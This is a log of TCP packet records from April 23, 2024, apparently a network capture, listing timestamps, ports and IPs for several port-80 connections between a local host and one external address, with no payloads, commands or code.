Apr 23, 2024 14:47:45.528248072 CEST	80	49715	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:45.528335094 CEST	49715	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:45.528636932 CEST	49715	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:45.766014099 CEST	80	49715	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:45.766345978 CEST	80	49715	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:45.766405106 CEST	80	49715	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:45.766444921 CEST	80	49715	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:45.766480923 CEST	80	49715	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:45.766516924 CEST	80	49715	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:45.766552925 CEST	80	49715	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:45.766558886 CEST	49715	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:45.766558886 CEST	49715	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:45.766588926 CEST	80	49715	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:45.766592979 CEST	49715	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:45.766731977 CEST	80	49715	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:45.766747952 CEST	80	49715	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:45.766797066 CEST	49715	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:45.766905069 CEST	80	49715	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:45.766942024 CEST	49715	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:46.003943920 CEST	80	49715	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:46.003968000 CEST	80	49715	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:46.003978968 CEST	80	49715	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:46.003992081 CEST	80	49715	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:46.004082918 CEST	49715	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:46.005335093 CEST	49715	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:46.242366076 CEST	80	49715	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:46.242536068 CEST	80	49715	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:46.242791891 CEST	80	49715	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:46.242804050 CEST	80	49715	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:46.242846966 CEST	49715	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:46.243061066 CEST	80	49715	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:46.243073940 CEST	80	49715	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:46.243113995 CEST	49715	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:46.243280888 CEST	80	49715	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:46.243321896 CEST	49715	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:46.243339062 CEST	80	49715	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:46.243545055 CEST	80	49715	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:46.243556023 CEST	80	49715	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:46.243587971 CEST	49715	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:46.244292974 CEST	80	49715	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:46.244304895 CEST	80	49715	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:46.244338036 CEST	49715	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:46.244481087 CEST	80	49715	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:46.244492054 CEST	80	49715	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:46.244524956 CEST	49715	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:46.244637012 CEST	80	49715	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:46.244678020 CEST	49715	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:46.246022940 CEST	49715	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:52.682491064 CEST	49717	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:52.919593096 CEST	80	49717	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:52.919713020 CEST	49717	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:52.920108080 CEST	49717	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:53.157022953 CEST	80	49717	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:53.157114983 CEST	80	49717	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:53.157315969 CEST	80	49717	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:53.157334089 CEST	80	49717	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:53.157397985 CEST	49717	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:53.157440901 CEST	80	49717	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:53.157459021 CEST	80	49717	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:53.157497883 CEST	49717	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:53.157672882 CEST	80	49717	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:53.157690048 CEST	80	49717	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:53.157730103 CEST	49717	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:53.157876968 CEST	80	49717	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:53.157893896 CEST	80	49717	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:53.157938004 CEST	49717	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:53.158083916 CEST	80	49717	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:53.158147097 CEST	49717	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:53.394687891 CEST	80	49717	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:53.394733906 CEST	80	49717	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:53.394831896 CEST	80	49717	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:53.394826889 CEST	49717	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:53.394876957 CEST	80	49717	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:53.394974947 CEST	49717	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:53.396239042 CEST	49717	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:53.633012056 CEST	80	49717	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:53.633371115 CEST	80	49717	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:53.633738041 CEST	80	49717	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:53.633753061 CEST	80	49717	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:53.633815050 CEST	49717	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:53.633920908 CEST	80	49717	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:53.633936882 CEST	80	49717	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:53.633968115 CEST	49717	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:53.634269953 CEST	80	49717	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:53.634283066 CEST	80	49717	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:53.634335995 CEST	49717	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:53.634479046 CEST	80	49717	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:53.634521961 CEST	80	49717	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:53.634526968 CEST	49717	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:53.634808064 CEST	80	49717	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:53.634820938 CEST	80	49717	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:53.634855986 CEST	49717	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:53.635072947 CEST	80	49717	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:53.635088921 CEST	80	49717	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:53.635123014 CEST	49717	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:53.635289907 CEST	80	49717	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:53.635329962 CEST	49717	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:53.637027979 CEST	49717	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:57.942277908 CEST	49718	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:58.185775042 CEST	80	49718	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:58.185947895 CEST	49718	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:58.186276913 CEST	49718	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:58.429517031 CEST	80	49718	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:58.429574013 CEST	80	49718	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:58.429778099 CEST	80	49718	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:58.429820061 CEST	80	49718	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:58.429941893 CEST	80	49718	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:58.429945946 CEST	49718	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:58.429980040 CEST	80	49718	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:58.430023909 CEST	49718	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:58.430160999 CEST	80	49718	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:58.430208921 CEST	49718	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:58.430217981 CEST	80	49718	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:58.430375099 CEST	80	49718	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:58.430411100 CEST	80	49718	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:58.430428982 CEST	49718	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:58.430520058 CEST	80	49718	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:58.430569887 CEST	49718	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:58.673466921 CEST	80	49718	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:58.673528910 CEST	80	49718	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:58.673567057 CEST	80	49718	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:58.673593998 CEST	49718	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:58.673604012 CEST	80	49718	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:58.673650026 CEST	49718	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:58.674746037 CEST	49718	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:58.918200970 CEST	80	49718	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:58.918335915 CEST	80	49718	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:58.918543100 CEST	80	49718	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:58.918581009 CEST	80	49718	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:58.918606997 CEST	49718	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:58.918682098 CEST	80	49718	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:58.918720007 CEST	80	49718	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:58.918740034 CEST	49718	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:58.918936968 CEST	80	49718	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:58.918975115 CEST	80	49718	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:58.918997049 CEST	49718	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:58.919152021 CEST	80	49718	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:58.919188976 CEST	80	49718	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:58.919213057 CEST	49718	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:58.919300079 CEST	80	49718	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:58.919334888 CEST	80	49718	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:58.919359922 CEST	49718	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:58.919527054 CEST	80	49718	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:58.919564009 CEST	80	49718	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:58.919584990 CEST	49718	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:58.919687986 CEST	80	49718	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:58.919743061 CEST	49718	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:58.921358109 CEST	49718	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:14.061197042 CEST	49721	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:14.303869009 CEST	80	49721	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:14.303996086 CEST	49721	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:14.304297924 CEST	49721	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:14.546649933 CEST	80	49721	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:14.546708107 CEST	80	49721	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:14.546916962 CEST	80	49721	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:14.546958923 CEST	80	49721	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:14.546974897 CEST	49721	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:14.547163010 CEST	80	49721	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:14.547199965 CEST	80	49721	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:14.547214031 CEST	49721	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:14.547410965 CEST	80	49721	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:14.547447920 CEST	80	49721	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:14.547456026 CEST	49721	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:14.547631979 CEST	80	49721	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:14.547669888 CEST	80	49721	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:14.547688961 CEST	49721	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:14.547705889 CEST	80	49721	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:14.547748089 CEST	49721	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:14.789695024 CEST	80	49721	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:14.789753914 CEST	80	49721	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:14.789776087 CEST	80	49721	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:14.789797068 CEST	80	49721	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:14.789957047 CEST	49721	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:14.791205883 CEST	49721	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:15.033660889 CEST	80	49721	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:15.033746004 CEST	80	49721	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:15.034003973 CEST	80	49721	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:15.034044981 CEST	80	49721	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:15.034111023 CEST	49721	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:15.034267902 CEST	80	49721	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:15.034306049 CEST	80	49721	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:15.034349918 CEST	49721	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:15.034430027 CEST	80	49721	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:15.034471035 CEST	49721	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:15.034491062 CEST	80	49721	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:15.034614086 CEST	80	49721	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:15.034650087 CEST	80	49721	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:15.034652948 CEST	49721	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:15.034852028 CEST	80	49721	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:15.034888983 CEST	80	49721	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:15.034890890 CEST	49721	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:15.035017967 CEST	80	49721	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:15.035056114 CEST	80	49721	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:15.035094976 CEST	49721	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:15.035207033 CEST	80	49721	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:15.039033890 CEST	49721	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:15.041928053 CEST	49721	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:25.359565973 CEST	49722	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:25.596563101 CEST	80	49722	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:25.596755028 CEST	49722	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:25.597404957 CEST	49722	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:25.834067106 CEST	80	49722	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:25.834140062 CEST	80	49722	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:25.834398985 CEST	80	49722	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:25.834439993 CEST	80	49722	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:25.834467888 CEST	49722	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:25.834544897 CEST	80	49722	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:25.834583044 CEST	80	49722	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:25.834594011 CEST	49722	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:25.834902048 CEST	80	49722	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:25.834939003 CEST	80	49722	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:25.834958076 CEST	49722	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:25.835051060 CEST	80	49722	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:25.835088968 CEST	80	49722	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:25.835107088 CEST	49722	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:25.835303068 CEST	80	49722	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:25.835362911 CEST	49722	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:26.071300030 CEST	80	49722	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:26.071363926 CEST	80	49722	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:26.071404934 CEST	80	49722	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:26.071444035 CEST	80	49722	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:26.071548939 CEST	49722	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:26.071548939 CEST	49722	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:26.072690964 CEST	49722	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:26.309247017 CEST	80	49722	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:26.309322119 CEST	80	49722	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:26.309514999 CEST	80	49722	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:26.309560061 CEST	80	49722	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:26.309600115 CEST	49722	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:26.309731007 CEST	80	49722	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:26.309767962 CEST	80	49722	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:26.309792995 CEST	49722	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:26.309971094 CEST	80	49722	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:26.310009003 CEST	80	49722	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:26.310031891 CEST	49722	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:26.310107946 CEST	80	49722	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:26.310143948 CEST	80	49722	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:26.310163975 CEST	49722	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:26.310419083 CEST	80	49722	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:26.310456038 CEST	80	49722	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:26.310482025 CEST	49722	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:26.310554981 CEST	80	49722	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:26.310590982 CEST	80	49722	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:26.310612917 CEST	49722	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:26.310729980 CEST	80	49722	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:26.310786009 CEST	49722	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:26.312446117 CEST	49722	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:34.526331902 CEST	49723	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:34.770649910 CEST	80	49723	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:34.770761013 CEST	49723	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:34.771184921 CEST	49723	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:35.014343023 CEST	80	49723	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:35.014450073 CEST	80	49723	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:35.014610052 CEST	80	49723	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:35.014651060 CEST	80	49723	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:35.014720917 CEST	49723	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:35.014858007 CEST	80	49723	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:35.014897108 CEST	80	49723	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:35.015017986 CEST	49723	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:35.015079975 CEST	80	49723	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:35.015120029 CEST	80	49723	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:35.015129089 CEST	49723	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:35.015314102 CEST	80	49723	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:35.015351057 CEST	80	49723	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:35.015363932 CEST	49723	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:35.015422106 CEST	80	49723	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:35.015490055 CEST	49723	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:35.258491993 CEST	80	49723	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:35.258538961 CEST	80	49723	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:35.258584976 CEST	49723	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:35.258889914 CEST	80	49723	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:35.258927107 CEST	80	49723	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:35.258971930 CEST	49723	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:35.260272026 CEST	49723	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:35.503344059 CEST	80	49723	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:35.503592014 CEST	80	49723	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:35.503818035 CEST	80	49723	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:35.503856897 CEST	80	49723	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:35.503894091 CEST	80	49723	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:35.503931999 CEST	80	49723	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:35.503981113 CEST	49723	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:35.503981113 CEST	49723	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:35.504139900 CEST	80	49723	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:35.504184961 CEST	80	49723	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:35.504220963 CEST	49723	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:35.504257917 CEST	80	49723	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:35.504296064 CEST	80	49723	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:35.504308939 CEST	49723	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:35.505289078 CEST	80	49723	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:35.505326033 CEST	80	49723	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:35.505335093 CEST	49723	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:35.505501032 CEST	80	49723	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:35.505539894 CEST	49723	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:35.505554914 CEST	80	49723	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:35.505675077 CEST	80	49723	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:35.505717039 CEST	49723	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:35.506936073 CEST	49723	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:49.512146950 CEST	49724	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:49.755562067 CEST	80	49724	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:49.755692959 CEST	49724	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:49.756007910 CEST	49724	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:49.999231100 CEST	80	49724	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:49.999279976 CEST	80	49724	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:49.999561071 CEST	80	49724	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:49.999599934 CEST	80	49724	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:49.999629021 CEST	49724	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:49.999663115 CEST	80	49724	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:49.999701023 CEST	80	49724	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:49.999706984 CEST	49724	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:50.000232935 CEST	80	49724	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:50.000271082 CEST	80	49724	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:50.000277042 CEST	49724	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:50.000489950 CEST	80	49724	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:50.000528097 CEST	80	49724	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:50.000534058 CEST	49724	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:50.000659943 CEST	80	49724	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:50.000704050 CEST	49724	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:50.243073940 CEST	80	49724	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:50.243133068 CEST	80	49724	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:50.243170977 CEST	80	49724	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:50.243205070 CEST	80	49724	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:50.243309021 CEST	49724	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:50.243309021 CEST	49724	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:50.244282007 CEST	49724	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:50.487543106 CEST	80	49724	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:50.487709999 CEST	80	49724	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:50.487844944 CEST	80	49724	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:50.487886906 CEST	80	49724	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:50.487921953 CEST	49724	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:50.487978935 CEST	80	49724	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:50.488020897 CEST	80	49724	82.146.61.164	192.168.2.5
Apr 23, 2024 14:48:50.488039970 CEST	49724	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:48:50.488163948 CEST	80	49724	82.146.61.164	192.168.2.5
